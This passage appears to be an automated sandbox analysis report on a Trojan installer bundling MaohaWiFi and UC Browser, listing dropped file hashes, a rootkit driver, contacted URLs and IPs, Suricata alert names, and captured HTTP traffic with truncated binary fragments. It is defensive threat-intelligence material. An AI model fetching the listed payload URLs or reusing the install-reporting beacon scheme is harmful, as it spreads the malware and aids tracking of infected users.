1f0f865b1fea713bb9dc480c7c786197 c:\Program Files\Maoha\MaohaAP\ext\6.dll
68b2a121a539371262af32004abd2b20 c:\Program Files\Maoha\MaohaAP\gzipdll.dll
f96221d6c46ce19751c43c423b7c3ba1 c:\Program Files\Maoha\MaohaAP\maohasubstat.dll
1d66e130dac29c706a1005268d98dab0 c:\Program Files\Maoha\MaohaAP\pcid.dll
b493c0cdee36755385cee0057c25175f c:\Program Files\Maoha\MaohaAP\pcidetect.dll
0a2041af48f0fbda65876fc7efdc5c9a c:\Program Files\Maoha\MaohaAP\softconfig.dll
618b8336c03c31a3f79a39d9e89983ea c:\Program Files\Maoha\MaohaAP\tips.exe
02d316a6166508f4bd5fc478562f2bc1 c:\Program Files\Maoha\MaohaAP\tipsdll.dll
0a2ec8bd4f918532798fc4ae82051862 c:\Program Files\Maoha\MaohaAP\uninstall.dll
20767cbd7240875b406b0f02c4da609a c:\Program Files\mgdisk\mgdinst.dll
4b6cc3c484f1b668eb54079d09993a67 c:\Program Files\mgdisk\mgdisk.exe
757dcebc20767cd62736914427b27e97 c:\Program Files\mgdisk\sciter32.dll
9120403115f68fc32af4a1794e39cc8e c:\Program Files\mgdisk\sqlite3.dll
ddbf6c8aa0385708294821ba21376a8e c:\Program Files\mgdisk\uninst.exe
c7d4d685a0af2a09cbc21cb474358595 c:\Program Files\mgdisk\zlib.dll
71bfd5d8c505e34b008b11e6917b2750 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\26512\UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.exe
5a02fcd66a1c080d2256e7917adad77c c:\Windows\System32\drivers\cryptfd.sys

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\??\%Program Files%\Maoha\MaohaAP\MaoHaWiFiNet.sys" the Trojan controls operations with a system registry by installing the registry notifier.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 1353007 1353216 4.32418 5788e4d83cdea7793ded7b1f06e723de
.rdata 1359872 272566 272896 3.28055 f6a7e0d24fab81d6be4e816919ec38e3
.data 1634304 88908 33792 3.63856 80692f4fb3275b9706c71ab37835f246
.rsrc 1724416 488 512 3.30399 49b537b76b67c37acf0ee3c80003a292
.reloc 1728512 69304 69632 4.53487 4580b63d126c8188eae2aa552d36155a

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://e6640.g.akamaiedge.net/js/geo2.js
hxxp://xiaobingdou.com/anzhuang.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzE3MjFEMDBDNTdEQThEQTk1MzI4NDM3REJFNkYwOTRBNENCRkRDMjlFQUEzOUFDRjRGNTlBOUM0M0NEMEI0RUQ2RTcyNEY5MzREODM5QkY2MzFDOTk0QThDRENGOEU1MzE= 23.234.26.217
hxxp://xiaobingdou.com/reportInstallaa.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzE3MjFEMDBDNTdEQThEQTk1MzI4NDM3REJFNkYwOTRBNDU5QTJBRDc1MjJGRTBCMEQzMDQ1M0E3QTU2RTYyMzU3REI1NzI3MUVCN0IzQ0U2MzdFOTY4MTM5QjI3RDY4RTg0MUJGMzEzQzAzNTcwM0FBQkZBNzIxQjRBMTMxOTY3MTZEM0FEQTRDMUYyOTYwNUQxREFBMjU5MEVDRENGMDBCMTM2QjIxRjhEQkQ3OEYwQkY4RTJCRkExRDJGQzg1NTU= 23.234.26.217
hxxp://xiaobingdou.com/jihuo.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzE3MjFEMDBDNTdEQThEQTk1MzI4NDM3REJFNkYwOTRBNENCM0YyN0U3MTIzM0JGODY2QUZDM0MzMkYwRjYyNzhERDBFMzIwREU5RkUxRDU1NTczMUQ4Rjg1RDA5QUNCNEFFNjBEODc2NTAzNzQzRDc5Qjg5MDJGNEUyMTNDQkI1NTM2QTRBN0YzMkI3NUFDNUNEQzEzNDRGNDMwRURGNEI2 23.234.26.217
hxxp://dns.union.uc.cn/pcbrowser/down.php?pid=4043
hxxp://software77.net/geo-ip/ 63.247.71.18
hxxp://umcdn.uc.cn.w.alikunlun.com/down/4043/UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.exe 80.231.126.236
hxxp://1st.dl.ourdvs.com/soft/mhwifi/MaoHaWiFiSetup_265.exe
hxxp://xiaobingdou.com/reportInstallaa.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzE3MjFEMDBDNTdEQThEQTk1MzI4NDM3REJFNkYwOTRBNDU5QTJBRDc1MjJGRTBCMEQzMDQ1M0E3QTU2RTYyMzU3MjZFNTA0M0I1NkY3MkUxRkQ2NkY2OEYyOTY1Q0E2OUI4MTg3NjU3MkU3M0VBNjNFMzY2NzhEQzg2ODI3Q0VGNEI1MTY0NTRCODA3MUEwMDY0Mzk0NDEzRDlCOTY2MUI1Nzc1MzMyOUIyMEU1Q0JDRUQwNjU2NzdBOTFENUQxQUQ3NUVBQ0E3RTM2QzdDNDk2QTNCMDhFM0M0NTUyQUEzOERCNEI2NzQxRjA1OERBRTMxMUJFRjAzNzUzNzgzMTJB 23.234.26.217
hxxp://wow.uc.cn.danuoyi.alicdn.com/biz-data/sec/channel/test/config/av_config.ini 195.27.31.253
hxxp://dns.union.uc.cn/pcbrowser/down.php?type=dll&pid=4043
hxxp://xiaobingdou.com/reportInstallaa.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzE3MjFEMDBDNTdEQThEQTk1MzI4NDM3REJFNkYwOTRBNDU5QTJBRDc1MjJGRTBCMEQzMDQ1M0E3QTU2RTYyMzU3MjZFNTA0M0I1NkY3MkUxRkQ2NkY2OEYyOTY1Q0E2OUI5MjREMEMzMjM2NzgwMDc4MzAzQzg1NjNFRTI1NTdCQkUxNzUwN0MwQTgwOTk0QjgxM0E5MTZFMTY2RDMyMjc1M0U4NEE2Mzk3MzQ1MTZERDY2N0JEQjA5NEVFOTI2Q0YzMzQ1REM0RjYzMTZDMjlBMDEzQUQ2MTg5RUM1OTQ1QUI4RTE1RUE1QTUwQzNFM0ExNzk2RTA2QjRERTQ2RTIwNzY3QjVFQzE5NEMzMDc5NjMxNzg4MTk1NDRCOTQ1MjM= 23.234.26.217
hxxp://umcdn.uc.cn.w.alikunlun.com/down/4043/UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.dll 80.231.126.236
hxxp://xiaobingdou.com/reportInstallaa.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzE3MjFEMDBDNTdEQThEQTk1MzI4NDM3REJFNkYwOTRBNDU5QTJBRDc1MjJGRTBCMEQzMDQ1M0E3QTU2RTYyMzU3MjZFNTA0M0I1NkY3MkUxRkQ2NkY2OEYyOTY1Q0E2OUIxMzQ0MjA2N0Y3QTEwMjQ0NTY5NUI3NDUyNkJGQ0QzN0FDRTc2NDQzOTFGQTFDQzYzRjdEMjlGNjlCNTdGMTcxMEM2NTI3QjIwQTJDMUI3NzlDRjA1RDk1MjdERjJFQ0E5MDNENTEyNzY2MDk4QjcxRkE5M0IxQ0M4MUZDNDU5RTFCQ0M0MDE4NEVEN0NGOEUyMUI2MTdDMjlCNjQ2Rjcx 23.234.26.217
hxxp://a767.dspw65.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab 62.140.236.170
hxxp://umcdn.uc.cn/down/4043/UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.dll 80.231.126.236
hxxp://res.maoha.com/soft/mhwifi/MaoHaWiFiSetup_265.exe 203.130.56.136
hxxp://cdn3.optimizely.com/js/geo2.js 23.64.225.232
hxxp://down2.uc.cn/pcbrowser/down.php?type=dll&pid=4043 123.150.188.19
hxxp://wow.uc.cn/biz-data/sec/channel/test/config/av_config.ini 195.27.31.253
hxxp://45.32.112.142/setup.3.15.exe
hxxp://umcdn.uc.cn/down/4043/UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.exe 80.231.126.236
hxxp://down2.uc.cn/pcbrowser/down.php?pid=4043 123.150.188.19
unin.maohawifi.com 121.10.143.40
service.maohawifi.com
update.ss.maohawifi.com


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE Double User-Agent (User-Agent User-Agent)
ET POLICY Abnormal User-Agent No space after colon - Likely Hostile
ET POLICY PE EXE or DLL Windows file download HTTP
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /reportInstallaa.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzE3MjFEMDBDNTdEQThEQTk1MzI4NDM3REJFNkYwOTRBNDU5QTJBRDc1MjJGRTBCMEQzMDQ1M0E3QTU2RTYyMzU3MjZFNTA0M0I1NkY3MkUxRkQ2NkY2OEYyOTY1Q0E2OUIxMzQ0MjA2N0Y3QTEwMjQ0NTY5NUI3NDUyNkJGQ0QzN0FDRTc2NDQzOTFGQTFDQzYzRjdEMjlGNjlCNTdGMTcxMEM2NTI3QjIwQTJDMUI3NzlDRjA1RDk1MjdERjJFQ0E5MDNENTEyNzY2MDk4QjcxRkE5M0IxQ0M4MUZDNDU5RTFCQ0M0MDE4NEVEN0NGOEUyMUI2MTdDMjlCNjQ2Rjcx HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 30 May 2017 13:36:57 GMT
Connection: close
Content-Length: 0



GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 86410
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Fri, 16 Sep 2016 21:16:59 GMT
If-None-Match: "8017f9a85f10d21:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: VVV.download.windowsupdate.com


HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: application/vnd.ms-cab-compressed
Last-Modified: Wed, 19 Apr 2017 22:43:31 GMT
Accept-Ranges: bytes
ETag: "80ab755e5eb9d21:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 52608
Date: Tue, 30 May 2017 13:36:37 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
MSCF............,...................I.......f..........Je} .authroot.s
tl..Q...6..CK...8...........].y.Q..!Jv..%k.....!..DH.....^..*.E)7k..Rq
...Lu..........[.y..s...~.4.~....4.0a..f.;.~7'M...a<.... .IO'....Z.
.E..F.XuV.....L..@..Y.L......GW.{fd<.8...*~...*...@.e...Xx).{....3T
.C....'..v..A.X......l....3.=..w....P...s#..;...C.(./.. .C.tC...gnI..j
W89.JQ...y..gq.3.Z&.Gz...NV.t...(J.../..%9..W..>.h;$.@..f..La.k....
..s ......`..G..C......@.....@b.....G...x...l".s.c.0......X...C.H.....
.....T.....}.R.`..../...1Z......X..oX...;....f.......LG[....~;.}mw.'. 
..v......`.7ZR..-.........8.....>.:(..........keX.. r......B...Z.ax
C....... 0.#....\.8.....$t:$(.Q....kQ........s.}3b.e.xb....7...r:.<
..>m..:.V.u....kn.3.Y.ar.,.y..b.....{.OO?c/;m.v..k.o.Kj...0G.m.....
j*.U....... ..~.....Z.dS.J..S.y.c...y.......{..Co...i.U....7.i]......W
...T...Y..X..........e.b.`*Uk.T..a....*...M^m..Jvk..g........<d:l..
Sq.H...*y...x1.e....<..V.q..u."v.};G.Px.......{....Y.........5..`..
..x..b_.....W.Mn...5d.,.0|.9".g..L..R.....g..............."  z(.F.$.@.
@......}r..O8P.W.Tr./}\.....X..f=..d`,.X..'.r.8....q.Or:..<v.zFW.Y.
.....nk.:..G.K...GxQ._2!.....t?..(.q...e.&F.............2JG.....b...~.
./....M.6.~.b<...).(.Iy..P..$n. ....._..#.aBz....)..[.2............
..........Ew..9-.2;...2.g.5.-..G.o....K.J..,...(...bd.$..0..r..Z....*.
....._.B.)b<.w}t....]..t....=....b.?...u..A..Z.....6........n12j.0"
.U..,..fd_$A."....... .G.c.u...k.....l....$.@.`A.>,....L}.O......X.
.....rL.GM..p..H;....O@..Q2..T........]..e.G...9.W..06~..R..@V|...
<<< skipped >>>


GET /soft/mhwifi/MaoHaWiFiSetup_265.exe HTTP/1.0
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: res.maoha.com
Accept: */*
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sun, 28 May 2017 10:36:09 GMT
Content-Length: 5223968
Content-Type: stream
Last-Modified: Fri, 02 Dec 2016 08:06:26 GMT
Accept-Ranges: bytes
ETag: "de179ffa724cd21:2c3e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 183601
Via: 1.1 in97:4 (Cdn Cache Server V2.0), 1.1 ml121:0 (Cdn Cache Server V2.0)[0 200 0]
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......f..."..R"..R
"..R...Ra..R..|R*..R..}Ry..R .1R&..R .!R?..R"..Rq..R ..R#..RD.aRn..RD.
{R#..R".%R#..RD.~R#..RRich"..R........................PE..L....,,X....
..................H...................@...........................P...
...4P...@.....................................,....`....E...........O.
 ....@O.8W......8............................s..@...............d.....
.......................text............................... ..`.rdata..
............................@..@.data...,r..........................@.
...rsrc.....E..`....E.................@..@.reloc.......@O.......N.....
........@..B..........................................................
......................................................................
......................................................................
......................................................................
...................................................9...\....V3.Ph....j
.PPh...@.t$ ......F.3.........^......D$.....0........U..Qj..E.P.u..u..
1....F.....V...6....F....^.Qj...(.F....t...Pt...gt.3..3.@.h.......F...
.......3.3.h....f............SP....................9].t..u.VhL.G.h....
P..........VhX.G.h....P..............P............]..`.G........d.G.h.
...............SP.(............Phh.G.h`.G......Y........AP.N..........
..P....F........I..,.........................f....U....$SVW3.3..]..}..
...f..3.GW.E.P...]..]..]...P.F..E.SSWP....F..E..u....M..E......}..
<<< skipped >>>


GET /jihuo.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzE3MjFEMDBDNTdEQThEQTk1MzI4NDM3REJFNkYwOTRBNENCM0YyN0U3MTIzM0JGODY2QUZDM0MzMkYwRjYyNzhERDBFMzIwREU5RkUxRDU1NTczMUQ4Rjg1RDA5QUNCNEFFNjBEODc2NTAzNzQzRDc5Qjg5MDJGNEUyMTNDQkI1NTM2QTRBN0YzMkI3NUFDNUNEQzEzNDRGNDMwRURGNEI2 HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 30 May 2017 13:36:21 GMT
Connection: close
Content-Length: 0



GET /down/4043/UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.dll HTTP/1.1
Accept: */*
Connection: Keep-Alive
User-Agent: ChannelPromptDownloader
Cache-Control: no-cache
Host: umcdn.uc.cn


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/octet-stream
Content-Length: 53411216
Connection: keep-alive
Date: Thu, 04 May 2017 07:31:04 GMT
x-oss-request-id: 590AD8B8E7407D42271E5986
Accept-Ranges: bytes
ETag: "47F55C721B70A0C9F8BEA9490B90E667"
Last-Modified: Wed, 08 Mar 2017 10:50:22 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 13731573077453710924
x-oss-storage-class: Standard
Cache-Control: max-age=7776000
Content-MD5: R/VcchtwoMn4vqlJC5DmZw==
x-oss-server-time: 61
Via: cache19.l2sg1[0,200-0,H], cache32.l2sg1[1,0], cache1.es1[0,200-0,H], cache3.es1[0,0]
Age: 2268314
X-Cache: HIT TCP_MEM_HIT dirn:2:923361199
X-Swift-SaveTime: Thu, 04 May 2017 10:58:13 GMT
X-Swift-CacheTime: 2592000
Timing-Allow-Origin: *
EagleId: 50e77ecb14961513789327155e
MZ......................@...................................(.........
..!..L.!This program cannot be run in DOS mode....$.......^!...@t..@t.
.@t......@t.....f@t......@t.!.w..@t.!.p..@t.!.q.<@t.t.q..@t...q..@t
..8...@t..8...@t..@u..@t...}..@t...t..@t......@t..@...@t...v..@t.Rich.
@t.................PE..L......X...........!.....F....,......!.......`.
.............................. /......y/...@.........................p
...l............`.... ..............3..../.........T..................
.t...........@............`.. ............................text...mE...
....F.................. ..`.rdata.......`.......J..............@..@.da
ta...$"..........................@....gfids.......@...................
...@..@.tls.........P......................@....rsrc..... ..`.... ....
.............@..@.reloc......../.. ..................@..B.............
......................................................................
......................................................................
...............................................h......1....,..h.U...E.
..Y......h......1....,..h.U...%...Y..@....k...hcU.......Y.............
...U..j.h.>..d.....PV.....3.P.E.d........E......v.......j..D9...v..
Q.......F......E...F......F.....t.j.V...........M.d......Y^..]........
........... B..............A........A.......D....A.0....A.............
....U...M...VW..b.........;.u/.........s..E..M.....=D...u..A.3._^]..._
3.^]......|..........;.u..........s....\..........;.u2.........s..U...
.....B.#..E.....=D...u..B.3._^]..._..@..^]...Q.P...R.P._3.^]......
<<< skipped >>>


GET /reportInstallaa.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzE3MjFEMDBDNTdEQThEQTk1MzI4NDM3REJFNkYwOTRBNDU5QTJBRDc1MjJGRTBCMEQzMDQ1M0E3QTU2RTYyMzU3MjZFNTA0M0I1NkY3MkUxRkQ2NkY2OEYyOTY1Q0E2OUI5MjREMEMzMjM2NzgwMDc4MzAzQzg1NjNFRTI1NTdCQkUxNzUwN0MwQTgwOTk0QjgxM0E5MTZFMTY2RDMyMjc1M0U4NEE2Mzk3MzQ1MTZERDY2N0JEQjA5NEVFOTI2Q0YzMzQ1REM0RjYzMTZDMjlBMDEzQUQ2MTg5RUM1OTQ1QUI4RTE1RUE1QTUwQzNFM0ExNzk2RTA2QjRERTQ2RTIwNzY3QjVFQzE5NEMzMDc5NjMxNzg4MTk1NDRCOTQ1MjM= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 30 May 2017 13:36:35 GMT
Connection: close
Content-Length: 0



GET /setup.3.15.exe HTTP/1.0
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: 45.32.112.142
Accept: */*
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Tue, 30 May 2017 13:36:18 GMT
Content-Type: application/octet-stream
Content-Length: 2467144
Last-Modified: Thu, 25 May 2017 13:30:33 GMT
Connection: keep-alive
ETag: "5926dc79-25a548"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................n.......B...8............@..............
...................w.&...@.................................4........@.
.(N...........e%..?......d............................................
........................................text....m.......n.............
..... ..`.rdata..b*.......,...r..............@..@.data....~...........
...............@....ndata.......0...........................rsrc...(N.
..@...P..................@..@.reloc..2...........................@..B.
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....-G..H.P.u..u..u.....@..K...SV.5.-G.W.E.P.u.....@..e...E..E.P.u...
..@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.....
..P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h..F.W....@..u.W...u....E.P.
u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ
<<< skipped >>>


GET /reportInstallaa.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzE3MjFEMDBDNTdEQThEQTk1MzI4NDM3REJFNkYwOTRBNDU5QTJBRDc1MjJGRTBCMEQzMDQ1M0E3QTU2RTYyMzU3REI1NzI3MUVCN0IzQ0U2MzdFOTY4MTM5QjI3RDY4RTg0MUJGMzEzQzAzNTcwM0FBQkZBNzIxQjRBMTMxOTY3MTZEM0FEQTRDMUYyOTYwNUQxREFBMjU5MEVDRENGMDBCMTM2QjIxRjhEQkQ3OEYwQkY4RTJCRkExRDJGQzg1NTU= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 30 May 2017 13:36:20 GMT
Connection: close
Content-Length: 0



GET /pcbrowser/down.php?type=dll&pid=4043 HTTP/1.1
Accept: */*
Content-Length: 0
User-Agent: ChannelPromptDownloader
Host: down2.uc.cn
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Tue, 30 May 2017 13:36:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10
Set-Cookie: PHPSESSID=5uq0mingii9lgc5ctpns3237h4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: hXXp://umcdn.uc.cn/down/4043/UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.dll
0..HTTP/1.1 302 Moved Temporarily..Server: nginx..Date: Tue, 30 May 20
17 13:36:15 GMT..Content-Type: text/html..Transfer-Encoding: chunked..
Connection: keep-alive..X-Powered-By: PHP/5.3.10..Set-Cookie: PHPSESSI
D=5uq0mingii9lgc5ctpns3237h4; path=/..Expires: Thu, 19 Nov 1981 08:52:
00 GMT..Cache-Control: no-store, no-cache, must-revalidate, post-check
=0, pre-check=0..Pragma: no-cache..Location: hXXp://umcdn.uc.cn/down/4
043/UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.d
ll..0..



GET /down/4043/UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.exe HTTP/1.0
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: umcdn.uc.cn
Accept: */*
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/octet-stream
Content-Length: 404880
Connection: keep-alive
Date: Thu, 04 May 2017 10:51:47 GMT
x-oss-request-id: 590B07C3C73AC8253E3242B4
Accept-Ranges: bytes
ETag: "71BFD5D8C505E34B008B11E6917B2750"
Last-Modified: Wed, 08 Mar 2017 10:50:20 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 17826665700317366293
x-oss-storage-class: Standard
Cache-Control: max-age=7776000
Content-MD5: cb/V2MUF40sAixHmkXsnUA==
x-oss-server-time: 75
Via: cache13.l2sg1[0,200-0,H], cache3.l2sg1[1,0], cache2.es1[0,200-0,H], cache2.es1[0,0]
Age: 2256258
X-Cache: HIT TCP_MEM_HIT dirn:5:187077021
X-Swift-SaveTime: Thu, 04 May 2017 10:58:05 GMT
X-Swift-CacheTime: 2592000
Timing-Allow-Origin: *
EagleId: 50e77eca14961513653291011e
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........h..{...{..
.{..q....{..q...A{..q....{...%...{...%...{...%...{.......{.. "...{....
...{.......{...{...{..R%...{..W%...{...{...{..R%...{..Rich.{..........
PE..L......X.....................t....................@...............
...........p............@.................................x...........
.................3...0..l7..`l..T....................m.......l..@.....
.......................................text...........................
.... ..`.rdata..............................@..@.data....1............
..............@....gfids..D...........................@..@.tls........
........................@....rsrc...............................@..@.r
eloc..l7...0...8..................@..B................................
......................................................................
......................................................................
.............................................8...h..D......Y..........
........%..h .D......Y..................c..h0.D......Y.V. ;E........PV
...E......hl.D..v...Y^.V.P;E........PV...E......h{.D..P...Y^.V.t;E....
....PV...E......h..D..*...Y^.V..;E....`...PV...E......h..D......Y^.V..
;E....:...PV. .E..z...h..D......Y^.V..;E........PV.@.E..T...h..D......
Y^.V..;E........PV.`.E......h..D......Y^.V..;E........PV...E......h..D
..l...Y^.V..;E........PV...E......h..D..F...Y^.V..;E....|...PV...E....
..h..D.. ...Y^.V..<E....V...PV...E......h..D......Y^.V.,<E..
<<< skipped >>>


GET /reportInstallaa.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzE3MjFEMDBDNTdEQThEQTk1MzI4NDM3REJFNkYwOTRBNDU5QTJBRDc1MjJGRTBCMEQzMDQ1M0E3QTU2RTYyMzU3MjZFNTA0M0I1NkY3MkUxRkQ2NkY2OEYyOTY1Q0E2OUI4MTg3NjU3MkU3M0VBNjNFMzY2NzhEQzg2ODI3Q0VGNEI1MTY0NTRCODA3MUEwMDY0Mzk0NDEzRDlCOTY2MUI1Nzc1MzMyOUIyMEU1Q0JDRUQwNjU2NzdBOTFENUQxQUQ3NUVBQ0E3RTM2QzdDNDk2QTNCMDhFM0M0NTUyQUEzOERCNEI2NzQxRjA1OERBRTMxMUJFRjAzNzUzNzgzMTJB HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 30 May 2017 13:36:33 GMT
Connection: close
Content-Length: 0



GET /geo-ip/ HTTP/1.1
Accept: */*
User-Agent: Agent1309581
Host: software77.net
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Tue, 30 May 2017 13:36:04 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: text/html
7e16..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN
" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><htm
l xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="en" lang="en">..&l
t;head>.<title>IP to Country Database (IPV4 and IPV6)</tit
le>.<style type="text/css">{  }.body           { font-family:
 Verdana; font-size: 8pt; background-color:#929FB4; color:#000000 }.in
put          {border:3px outset #CCCCCC; background-color:#CCCCFF; fon
t-family:Verdana; font-size:8pt; font-weight:bold; text-align:center}.
input:hover    {border: 3px inset #FFFFFF;background-color: #FFFFFF;fo
nt-family: Verdana;font-size: 8pt;font-weight: bold;text-align: center
;color: #000000}.select         {border:3px outset #CCCCCC; background
-color:#CCCCFF; font-family:Verdana; font-size:8pt; font-weight:bold}.
select:hover   {border: 3px inset #FFFFFF;background-color: #006600;fo
nt-family: Verdana;font-size: 8pt;font-weight: bold;color: #FFFF00}.te
xtarea       {border:3px outset #CCCCCC; background-color:#CCCCFF; fon
t-family:Courier New; font-size:8pt; font-weight:bold; text-align:left
 }.textarea:hover {border: 3px inset #000000;background-color: #FFFFFF
;font-family: Courier New;font-size: 8pt;font-weight: bold;text-align:
 left;color: #000000}..frmbutton     {border-style:outset; border-widt
h:1px; style="font-family: serif"; font-size:12pt; color:#000080; font
-weight:bold; background-color:#808080; font-family:Courier New }..BIG
H          { font-family: Verdana; font-size: 14pt; background-col
<<< skipped >>>


GET /biz-data/sec/channel/test/config/av_config.ini HTTP/1.1
Accept: */*
Content-Length: 0
User-Agent: ChannelPromptDownloader
Host: wow.uc.cn
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/octet-stream
Content-Length: 32
Connection: keep-alive
Date: Tue, 30 May 2017 13:04:07 GMT
x-oss-request-id: 592D6DC76FA177397CD51E5A
Accept-Ranges: bytes
ETag: "54038E4A450A3F429405CCBE0DBFCFAE"
Last-Modified: Fri, 24 Feb 2017 08:50:01 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 10919123851284209732
x-oss-storage-class: Standard
Content-MD5: VAOOSkUKP0KUBcy Db/Prg==
x-oss-server-time: 2
Via: cache26.l2hk1[0,304-0,H], cache8.l2hk1[0,0], cache1.de1[0,200-0,H], cache10.de1[0,0]
Age: 1927
